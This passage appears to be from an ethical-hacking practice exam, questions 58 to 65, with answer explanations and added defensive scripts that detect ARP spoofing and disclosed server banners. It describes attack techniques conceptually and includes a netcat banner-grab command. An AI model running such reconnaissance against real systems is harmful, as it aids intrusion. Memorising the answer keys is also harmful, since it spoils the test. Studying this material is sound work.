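        "safe": find_ssi_directives(render_safe(PAGE, PAYLOAD)),
    }
```

The detector is a triage aid for testing, not a defence: as the text notes, the absence of `.shtml` pages proves nothing, and the real fix is to encode reflected input (or not reflect it into SSI-parsed pages at all) and to disable SSI execution where it is not needed.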
Question 58 of 65
58. Question
Alex was assigned to perform a penetration test against a website using Google dorks. He needs to get results with file extensions. Which operator should Alex use to achieve the desired result?
Correct
https://ahrefs.com/blog/google-advanced-search-operators/ filetype: restricts results to those of a certain file type, e.g. PDF, DOCX, TXT, PPT, etc. Note: the ext: operator can also be used; the results are identical.
Incorrect answers:
site: if you include [site:] in your query, Google will restrict the results to those websites in the given domain.
inurl: finds pages with a certain word (or words) in the URL. For example, inurl:apple returns only results containing the word apple in the URL.
define: a dictionary built into Google, basically. This will display the meaning of a word in a card-like result in the SERPs.
Question 59 of 65
59. Question
You have been instructed to organize the possibility of working remotely for employees. Their remote connections could be exposed to session hijacking during the work, and you want to prevent this possibility. You decide to use the technology that creates a safe and encrypted tunnel over a public network to securely send and receive sensitive information and prevent hackers from decrypting the data flow between the endpoints. Which of the following technologies will you use?
Correct
https://en.wikipedia.org/wiki/Virtual_private_network A virtual private network (VPN) extends a private network across a public network and enables users to send and receive data across shared or public networks as if their computing devices were directly connected to the private network. The benefits of a VPN include increases in functionality, security, and management of the private network. It provides access to resources inaccessible on the public network and is typically used for telecommuting workers. Encryption is common, although not an inherent part of a VPN connection. A VPN is created by establishing a virtual point-to-point connection through the use of dedicated circuits or with tunnelling protocols over existing networks. A VPN available from the public Internet can provide some of the benefits of a wide area network (WAN). From a user perspective, the resources available within the private network can be accessed remotely.
Incorrect answers:
Split tunneling https://en.wikipedia.org/wiki/Split_tunneling Split tunneling is a computer networking concept which allows a user to access dissimilar security domains like a public network (e.g., the Internet) and a local LAN or WAN at the same time, using the same or different network connections. This connection state is usually facilitated through the simultaneous use of a Local Area Network (LAN) Network Interface Card (NIC), radio NIC, Wireless Local Area Network (WLAN) NIC, and VPN client software application without the benefit of access control.
DMZ https://en.wikipedia.org/wiki/DMZ_(computing) A DMZ or demilitarized zone (sometimes referred to as a perimeter network or screened subnet) is a physical or logical subnetwork that contains and exposes an organization's external-facing services to an untrusted, usually larger, network such as the Internet. The purpose of a DMZ is to add an additional layer of security to an organization's local area network (LAN): an external network node can access only what is exposed in the DMZ, while the rest of the organization's network is firewalled. The DMZ functions as a small, isolated network positioned between the Internet and the private network.
Bastion host https://en.wikipedia.org/wiki/Bastion_host A bastion host is a special-purpose computer on a network specifically designed and configured to withstand attacks. The computer generally hosts a single application or process, for example, a proxy server or load balancer, and all other services are removed or limited to reduce the threat to the computer. It is hardened in this manner primarily due to its location and purpose, which is either on the outside of a firewall or inside of a demilitarized zone (DMZ) and usually involves access from untrusted networks or computers. These computers are also equipped with special networking interfaces to withstand high-bandwidth attacks through the Internet.
Question 60 of 65
60. Question
Are you sure your network is perfectly protected and that no evil hacker Ivan is listening to all your traffic? Well, ignorance is the greatest source of happiness. There is a powerful tool written in Go that allows an attacker to carry out a man-in-the-middle (MITM) attack using, for example, ordinary ARP spoofing. What tool are we talking about?
Correct
https://www.bettercap.org/ bettercap is a powerful, easily extensible and portable framework written in Go which aims to offer security researchers, red teamers and reverse engineers an easy-to-use, all-in-one solution with all the features they might possibly need for performing reconnaissance and attacking WiFi networks, Bluetooth Low Energy devices, wireless HID devices and Ethernet networks. One of its main features is: ARP, DNS, NDP and DHCPv6 spoofers for MITM attacks on IPv4- and IPv6-based networks. Incorrect answers: Wireshark https://www.wireshark.org/ Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. DerpNSpoof https://github.com/Trackbool/DerpNSpoof A simple DNS spoofing tool written in Python 3 with Scapy. Gobbler http://gobbler.sourceforge.net/ A spoofed remote OS detection tool.
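From the defender's side, the ARP spoofing that tools like bettercap automate leaves two visible traces in a victim's neighbor table: the gateway's entry suddenly maps to a different MAC, and one MAC claims more than one IP address. The script below is an added example, not code from the practice test or from the bettercap project; it parses constructed `ip neigh show` style output and reports both indicators. The gateway IP and its baseline MAC are assumptions standing in for what an inventory or DHCP lease record would supply.

```python
"""Detect ARP-spoofing indicators in a host's neighbor table.

Added example (not part of the practice test): ARP spoofing answers ARP
requests for the gateway's IP with the attacker's MAC. On the victim that
shows up as the gateway entry changing MAC, or as one MAC claiming several
IPs. This module parses `ip neigh show` style output (constructed sample
below) and reports those two indicators.
"""
import re
from collections import defaultdict

# Constructed sample of `ip neigh show` output: the gateway 192.168.1.1 and the
# host 192.168.1.50 resolve to the same MAC, the classic sign that the host at
# .50 is impersonating the gateway.
SAMPLE_NEIGH = """\
192.168.1.1 dev eth0 lladdr aa:bb:cc:dd:ee:50 REACHABLE
192.168.1.20 dev eth0 lladdr 00:11:22:33:44:20 STALE
192.168.1.50 dev eth0 lladdr aa:bb:cc:dd:ee:50 REACHABLE
192.168.1.77 dev eth0 FAILED
"""

# Known-good gateway MAC recorded while the network was trusted (assumption:
# in practice an asset inventory or DHCP lease record supplies this value).
GATEWAY_IP = "192.168.1.1"
GATEWAY_BASELINE_MAC = "00:11:22:33:44:01"

NEIGH_RE = re.compile(
    r"^(?P<ip>\S+)\s+dev\s+(?P<dev>\S+)"
    r"(?:\s+lladdr\s+(?P<mac>[0-9a-f:]{17}))?\s+(?P<state>\S+)$",
    re.IGNORECASE,
)


def parse_neigh(text):
    """Return a list of (ip, mac) for entries that carry a link-layer address."""
    entries = []
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m and m.group("mac"):
            entries.append((m.group("ip"), m.group("mac").lower()))
    return entries


def find_duplicate_macs(entries):
    """Map each MAC that claims more than one IP to the sorted list of those IPs."""
    by_mac = defaultdict(set)
    for ip, mac in entries:
        by_mac[mac].add(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_mac_changed(entries, gateway_ip=GATEWAY_IP, baseline=GATEWAY_BASELINE_MAC):
    """True when the gateway's current MAC differs from the recorded baseline."""
    current = dict(entries).get(gateway_ip)
    return current is not None and current != baseline.lower()


def arp_alerts(text):
    """Produce human-readable alert strings for the two indicators."""
    entries = parse_neigh(text)
    alerts = []
    for mac, ips in find_duplicate_macs(entries).items():
        alerts.append(f"MAC {mac} claims multiple IPs: {', '.join(ips)}")
    if gateway_mac_changed(entries):
        alerts.append(f"gateway {GATEWAY_IP} MAC differs from baseline {GATEWAY_BASELINE_MAC}")
    return alerts


if __name__ == "__main__":
    for alert in arp_alerts(SAMPLE_NEIGH):
        print("ALERT:", alert)
```

Run periodically on endpoints or fed from a switch's MAC table, this catches the common case; a more robust control is Dynamic ARP Inspection on managed switches, or static ARP entries for the gateway on critical hosts.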
Question 61 of 65
61. Question
Lisandro was hired to steal critical business documents of a competitor company. Using a vulnerability in over-the-air programming (OTA programming) on Android smartphones, he sends messages to company employees on behalf of the network operator, asking them to enter a PIN code and accept new updates for the phone. After the employee enters the PIN code, Lisandro gets the opportunity to intercept all Internet traffic from the phone. What type of attack did Lisandro use?
Correct
https://en.wikipedia.org/wiki/Over-the-air_programming An over-the-air (OTA) update is the wireless delivery of new software, firmware, or other data to mobile devices. This technology has grown more prominent with the growth of mobile devices and applications. Mobile operators and telecommunication third parties can send OTA updates through SMS to configure data updates in SIM cards, distribute system updates, or access services such as Wireless Application Protocol (WAP) or Multimedia Messaging Service (MMS). OTA updates also enable mobile operators to activate user subscriptions. OEMs can use OTA updates to fix bugs through firmware and change the user interface. The proliferation of IoT has led manufacturers to use OTA updates for autonomous vehicles, smart home speakers, and other IoT devices. Check Point Research published an investigation of this attack under the title Advanced SMS Phishing Attacks Against Modern Android-based Smartphones. A security flaw in Samsung, LG, Sony, Huawei and other Android smartphones was discovered that leaves users vulnerable to advanced SMS phishing attacks, Check Point Research, the threat intelligence arm of cybersecurity firm Check Point Software Technologies Ltd., said on Thursday. The researchers said certain Samsung phones are the most vulnerable to this form of phishing attack because they do not perform an authenticity check on senders of Open Mobile Alliance Client Provisioning (OMA CP) messages. The affected Android phones use OTA provisioning, through which cellular network operators can deploy network-specific settings to a new phone joining their network. However, Check Point found that the industry standard for OTA provisioning, OMA CP, includes only limited authentication methods, and remote agents can exploit this to pose as network operators and send deceptive OMA CP messages to users.
The message tricks users into accepting malicious settings that route their Internet traffic through a proxy server owned by the attacker. NOTE: For the exam, it is enough just to know about this type of attack, but I advise you to read the full investigation – it is very interesting. This vulnerability affected a lot of Android phones, but it was quickly discovered and vendors released patches to fix it. Nevertheless, this vulnerability gave rise to a new level of smishing attacks – Advanced SMS Phishing.
Question 62 of 65
62. Question
Black-hat hacker Ivan attacked a large DNS server. By poisoning the cache, he was able to redirect the online store's traffic to a phishing site. Users did not notice the problem and believed that they were on the store's actual website, so they entered the data of their accounts and even bank cards. Before the security system had time to react, Ivan collected a large amount of critical user data. Which option is best suited to describe this attack?
Correct
https://csrc.nist.gov/glossary/term/pharming An attack in which an attacker corrupts an infrastructure service such as DNS (Domain Name System), causing the subscriber to be misdirected to a forged verifier/RP, which could cause the subscriber to reveal sensitive information, download harmful software, or contribute to a fraudulent act. There are a couple of different forms of pharming. In one form, code sent in an email modifies the local hosts file on a PC. The hosts file maps host names from Uniform Resource Locators (URLs) to the IP addresses that the computer uses to access websites. A computer with a compromised hosts file will go to the fake site even if a user types in the correct web address or clicks on an affected bookmark entry. Another pharming tactic is DNS poisoning. The DNS table in a server is modified, so someone who thinks they are accessing legitimate websites is directed toward fraudulent ones. In this method of pharming, individual PC hosts files don't need to be corrupted. Instead, the problem occurs in the DNS server, which handles millions of internet users' URL requests. Victims then end up at a bogus site without any visible indicator of a discrepancy. Incorrect answers: Spear-phishing https://en.wikipedia.org/wiki/Phishing#Spear_phishing Spear phishing involves an attacker directly targeting a specific organization or person with tailored phishing emails. This is essentially the creation and sending of emails to a particular person to make the person think the email is legitimate. In contrast to bulk phishing, spear phishing attackers often gather and use personal information about their target to increase the probability of success of the attack. Phishing https://en.wikipedia.org/wiki/Phishing Phishing is a type of social engineering where an attacker sends a fraudulent ("spoofed") message designed to trick a human victim into revealing sensitive information to the attacker or to deploy malicious software, such as ransomware, on the victim's infrastructure.
SPIT attack https://en.wikipedia.org/wiki/VoIP_spam VoIP spam or SPIT (spam over Internet telephony) is unsolicited, automatically dialed telephone calls, typically using voice over Internet Protocol (VoIP) technology. VoIP systems, like e-mail and other Internet applications, are susceptible to abuse by malicious parties who initiate unsolicited and unwanted communications, such as telemarketers and prank callers.
Question 63 of 65
63. Question
Which of the following is an anonymizer that masks real IP addresses and ensures complete and continuous anonymity for all online activities?
Correct
I know that this question looks very strange. However, you may come across a question on this topic on the exam. In order to answer it, it is enough to know which of the following is a service for anonymous surfing. https://www.guardster.com/ "Guardster offers various services to let you use the Internet anonymously and securely. From our popular free web proxy service, to our secure SSH tunnel proxy, we have a variety of services to suit your needs."
Question 64 of 65
64. Question
Alex, a security engineer, needs to determine how much information can be obtained from the firm's public-facing web servers. First of all, he decides to use Netcat to connect to port 80 and receives the following output:
HTTP/1.1 200 OK
Server: Microsoft-IIS/6
Expires: Tue, 17 Jan 2011 01:41:33 GMT
Date: Mon, 16 Jan 2011 01:41:33 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Wed, 28 Dec 2010 15:32:21 GMT
ETag: "b0aac0542e25c31:89d"
Content-Length: 7369
Which of the following did Alex do?
Correct
https://en.wikipedia.org/wiki/Banner_grabbing Banner grabbing is a technique used to gain information about a computer system on a network and the services running on its open ports. Administrators can use this to take inventory of the systems and services on their network. However, an intruder can use banner grabbing in order to find network hosts that are running versions of applications and operating systems with known exploits. Some examples of service ports used for banner grabbing are those used by Hypertext Transfer Protocol (HTTP), File Transfer Protocol (FTP), and Simple Mail Transfer Protocol (SMTP); ports 80, 21, and 25 respectively. Tools commonly used to perform banner grabbing are Telnet, Nmap and Netcat. For example, one could establish a connection to a target web server using Netcat, then send an HTTP request. The response will typically contain information about the service running on the host:
[root@prober]# nc www.targethost.com 80
HEAD / HTTP/1.1

HTTP/1.1 200 OK
Date: Mon, 11 May 2009 22:10:40 EST
Server: Apache/2.0.46 (Unix) (Red Hat/Linux)
Last-Modified: Thu, 16 Apr 2009 11:20:14 PST
ETag: "1986-69b-123a4bc6"
Accept-Ranges: bytes
Content-Length: 1110
Connection: close
Content-Type: text/html
Incorrect answers: SQL injection https://en.wikipedia.org/wiki/SQL_injection SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and is unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
Cross-site scripting https://en.wikipedia.org/wiki/Cross-site_scripting Cross-site scripting (XSS) is a type of security vulnerability typically found in web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec up until 2007. XSS effects vary in range from petty nuisance to significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner network. Cross-Site Request Forgery https://en.wikipedia.org/wiki/Cross-site_request_forgery Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf) or XSRF, is a type of malicious exploit of a website where unauthorized commands are submitted from a user that the web application trusts. There are many ways in which a malicious website can transmit such commands; specially crafted image tags, hidden forms, and JavaScript XMLHttpRequests, for example, can all work without the user's interaction or even knowledge. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser. In a CSRF attack, an innocent end user is tricked by an attacker into submitting a web request that they did not intend. This may cause actions to be performed on the website that can include inadvertent client or server data leakage, change of session state, or manipulation of an end user's account.
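The administrator's use of banner grabbing mentioned above, taking inventory of what one's own servers disclose, is easy to automate once the raw response is parsed. The script below is an added example, not code from the practice test; it parses a response header block like the one Alex received (embedded here as a constructed sample, one header per line) and reports whether the Server header discloses a version and whether that version looks out of vendor support. The OUT_OF_SUPPORT table is an illustrative assumption, not an authoritative lifecycle list.

```python
"""Parse a raw HTTP response header block and flag disclosed server versions.

Added example (not part of the practice test): the response Alex received is
what banner grabbing returns. A defender runs the same parse against their own
public-facing servers to inventory what they disclose. The end-of-support
table below is a constructed illustration, not an authoritative list.
"""
import re

# Constructed sample: the response quoted in the question, one header per line.
SAMPLE_RESPONSE = """\
HTTP/1.1 200 OK
Server: Microsoft-IIS/6
Expires: Tue, 17 Jan 2011 01:41:33 GMT
Date: Mon, 16 Jan 2011 01:41:33 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Wed, 28 Dec 2010 15:32:21 GMT
ETag: "b0aac0542e25c31:89d"
Content-Length: 7369

"""

# Illustrative products whose listed major (or major.minor) versions are long
# out of vendor support. Assumption for the example: maintain this from the
# vendor's own lifecycle data in a real inventory.
OUT_OF_SUPPORT = {
    "microsoft-iis": {"5", "6", "7"},
    "apache": {"1", "2.0", "2.2"},
}


def parse_response_head(raw):
    """Split the status line and headers; header names are lower-cased."""
    sep = "\r\n\r\n" if "\r\n\r\n" in raw else "\n\n"
    lines = raw.split(sep, 1)[0].splitlines()
    m = re.match(r"HTTP/(\d\.\d)\s+(\d{3})\s*(.*)", lines[0])
    if not m:
        raise ValueError("not an HTTP status line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if colon:  # skip malformed lines without a name/value separator
            headers[name.strip().lower()] = value.strip()
    return {"version": m.group(1), "status": int(m.group(2)), "headers": headers}


def server_product(server_header):
    """Return (product, version) from a Server header such as 'Microsoft-IIS/6'.

    Only the first token is considered, so 'Apache/2.0.46 (Unix)' gives
    ('apache', '2.0.46'); a bare product name gives an empty version.
    """
    token = server_header.split()[0] if server_header else ""
    product, _, version = token.partition("/")
    return product.lower(), version


def is_out_of_support(product, version):
    """True when the major or major.minor version is listed in OUT_OF_SUPPORT."""
    candidates = OUT_OF_SUPPORT.get(product, set())
    parts = version.split(".")
    return parts[0] in candidates or ".".join(parts[:2]) in candidates


def assess_banner(raw):
    """Summarise what a banner discloses and whether it looks end-of-life."""
    parsed = parse_response_head(raw)
    server = parsed["headers"].get("server", "")
    product, version = server_product(server)
    return {
        "server": server,
        "discloses_version": bool(version),
        "out_of_support": is_out_of_support(product, version),
    }


if __name__ == "__main__":
    print(assess_banner(SAMPLE_RESPONSE))
```

The practical mitigation the check points at is twofold: suppress or genericise the Server header (IIS and Apache both support this through configuration) so the banner stops advertising a version, and treat any disclosed version that the inventory marks end-of-life as a patching ticket rather than a header-hiding exercise.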
Question 65 of 65
65. Question
The attacker created a fraudulent email with a malicious attachment and sent it to employees of the target organization. An employee opened this email and clicked on the malicious attachment. As a result, the malware was downloaded and injected into the software used in the victim's system. The malware then propagated itself to other networked systems and finally damaged an industrial automation component. Which of the following attack techniques was used by the attacker?
Correct
Spear Phishing Attackers send fake emails containing malicious links or attachments that seemingly originate from the victim's legitimate or well-known sources. When the victim clicks on the link or downloads the attachment, it injects malware, starts damaging the resources, and spreads itself to other systems. For example, an attacker sends a fraudulent email with a malicious attachment to a victim system that maintains the sales software of the operational plant. When the victim downloads the attachment, the malware is injected into the sales software, propagates itself to other networked systems, and finally damages industrial automation components.

Incorrect answers:

HMI-based attack Human-Machine Interfaces (HMIs) are often called Hacker-Machine Interfaces. Even with the advancement and automation of OT, human interaction and control over the operational process remain challenges due to the underlying vulnerabilities. The lack of global standards for developing HMI software, and the absence of defense-in-depth security measures, lead to many security problems. Attackers exploit these vulnerabilities to perform various attacks such as memory corruption, code injection, privilege escalation, etc. on target OT systems.

SMishing attack Smishing is a form of phishing that uses mobile phones as the attack platform. The criminal executes the attack with an intent to gather personal information, including social insurance and/or credit card numbers. Smishing is implemented through text messages or SMS, giving the attack the name SMiShing.

Reconnaissance attack Reconnaissance attacks are general knowledge-gathering attacks. These attacks can happen through both logical and physical approaches. Whether the information is gathered via probing the network or through social engineering and physical surveillance, these attacks can be preventable as well. Some common examples of reconnaissance attacks include packet sniffing, ping sweeping, port scanning, phishing, social engineering and internet information queries.